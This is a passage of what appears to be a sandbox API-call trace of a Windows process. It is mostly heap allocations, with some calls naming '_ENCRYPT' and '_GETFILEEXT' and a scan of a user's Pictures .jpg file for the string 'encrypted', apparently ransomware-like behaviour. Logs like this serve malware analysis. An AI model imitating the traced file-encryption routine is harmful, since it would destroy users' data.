[0041.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0041.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0041.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0041.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0041.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0041.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0041.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0041.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0041.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0041.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.095] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0041.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0041.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0041.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0041.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0041.096] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0041.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0041.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0041.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0041.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0041.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0041.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0041.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0041.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0041.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0041.096] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0041.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0041.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0041.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0041.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0041.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0041.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0041.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0041.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0041.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0041.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.097] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0041.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0041.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899d0 [0041.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8899d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0041.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0041.098] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0041.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0041.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0041.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0041.098] CloseHandle (hObject=0x140) returned 1 [0041.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0041.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0041.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0041.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0041.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0041.098] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0041.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0041.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0041.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0041.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0041.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0041.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0041.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0041.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0041.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0041.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0041.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0041.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.099] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0041.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0041.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0041.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.099] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.099] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0041.099] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.099] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0041.099] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0041.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.099] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.099] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.100] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.100] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb975d470, ftCreationTime.dwHighDateTime=0x1d5b5db, ftLastAccessTime.dwLowDateTime=0x5d448bc0, ftLastAccessTime.dwHighDateTime=0x1d5c2ff, ftLastWriteTime.dwLowDateTime=0x5d448bc0, ftLastWriteTime.dwHighDateTime=0x1d5c2ff, nFileSizeHigh=0x0, nFileSizeLow=0x3a26, dwReserved0=0x0, dwReserved1=0x777648, cFileName="jn9U.jpg", cAlternateFileName="")) returned 0x7c20c0 [0041.100] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.100] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.100] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb975d470, ftCreationTime.dwHighDateTime=0x1d5b5db, ftLastAccessTime.dwLowDateTime=0x5d448bc0, ftLastAccessTime.dwHighDateTime=0x1d5c2ff, ftLastWriteTime.dwLowDateTime=0x5d448bc0, ftLastWriteTime.dwHighDateTime=0x1d5c2ff, nFileSizeHigh=0x0, nFileSizeLow=0x3a26, dwReserved0=0x0, dwReserved1=0x777648, cFileName="jn9U.jpg", cAlternateFileName="")) returned 0x7c20c0 [0041.100] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.100] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oaCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aCi\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ci\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xmQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mQr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qr1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I0\\jn9U.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 